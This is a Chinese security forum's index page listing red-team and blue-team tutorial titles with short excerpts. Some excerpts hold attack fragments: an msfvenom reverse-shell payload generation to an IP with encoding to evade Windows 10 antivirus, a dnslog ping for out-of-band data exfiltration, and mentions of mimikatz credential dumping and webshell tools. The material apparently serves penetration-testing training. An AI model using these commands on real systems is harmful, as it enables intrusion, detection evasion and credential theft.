HOLD社区 / 首页

  • 攻防演练中防守方的骚姿势
    数据外带类类型描述攻击方在对一个目标进行攻击时,会有一些漏洞探测的动作。当遇到没有回显的命令执行和注入时,会采用结合dnslog的方式。命令执行:pingxx.dnslog.comSQL注入:load....
    乔碧萝 / 2020-10-22

  • 红蓝对抗系列之浅谈蓝队反制红队的手法一二
    取证反查针对ip溯源一二一般来说,红队大部分都是使用代理节点进行测试,假如我们捕获或者从样本里面分析拿到了真实ip,那么以下操作场景就有用了,或者使用钓鱼反钓的方式获取到了真实ip。1:ip>来自创宇....
    FreeWill / 2020-10-20

  • Windows-Exploit-Suggester使用教程
    下载地址https://github.com/AonCyberLabs/Windows-Exploit-Suggester第一步:安装xlrdpipinstallxlrd第二步:获取漏洞库python....
    FreeWill / 2020-10-19

  • 渗透过程常见的高危端口
    17类高危端口具体指Telnet:23,Ftp:20/21,Ssh/Sftp:22,Tftp:69,Rpc:135,Netbios:137-139,SMB:445,Ldap:389,Xmanager/....
    FreeWill / 2020-10-19

  • 日站流程思路
    一:渗透操作系统(服务版本号漏洞检索法)操作系统类漏洞一般都是大神们通过代码审计/逆向分析挖掘的漏洞,这需要高深的知识储备,对于一般的渗透而言利用已知漏洞即可,不用也不要自己去挖掘这类漏洞。而查找操作....
    FreeWill / 2020-10-19

  • 近期公布的11个CVE漏洞总结
    参考自深信服千里目实验室、嘶吼专业版、互联网等,由HACK之道汇总。
    phper / 2020-10-15

  • CTF练习生,喜欢唱跳,rap,篮球
    这周做了一次四川省的ctf,感觉太难了,可能和自己没做过ctf有关吧,以后会开一个板块专门记录ctf相关
    蔡徐坤 / 2020-10-14

  • 蚁剑简单安装
    https://github.com/AntSwordProject/AntSword-Loader/releases找到下面的镜像下载自己机器对应的软件,下载好之后创建一个空目录(不要英文,最好也不....
    phper / 2020-10-13

  • 如何绕过堡垒机远程登录
    假设一个场景: 在Webshell中执行mimikatz获取到win管理员密码,并且本地查看端口3389是开放的,可是从当前跳板机无法远程到目标机器。 因为某个特定需求,一定要远程登录到这台w....
    乔碧萝 / 2020-10-09

  • excel正则匹配ip并去重
    varstr=`要处理的数据字符串`;varresult=str.match(/(\d{1,3}\.){3}\d{1,3}/g);//varresult=[1,1,3,456,6,7,4,3];//去....
    乔碧萝 / 2020-10-09

  • metasploit绕过win10实时防护免杀方法
    在生成木马的基础上加上一个encoder参数编码做到免杀msfvenom-pwindows/shell_reverse_tcpLHOST=10.8.1.46LPORT=4444-ex86/shikat....
    FreeWill / 2020-10-05

  • frp内网穿透结合metasploit
    1.frp是一款免费的内网穿透工具,当两个局域网的时候可以通过这个来进行渗透2.首先准备一台具有公网的服务器3.和ftp一样都是具有s端和c端的,s端下载和c端下载一定要保持版本号一直,再根据不同的内....
    FreeWill / 2020-10-05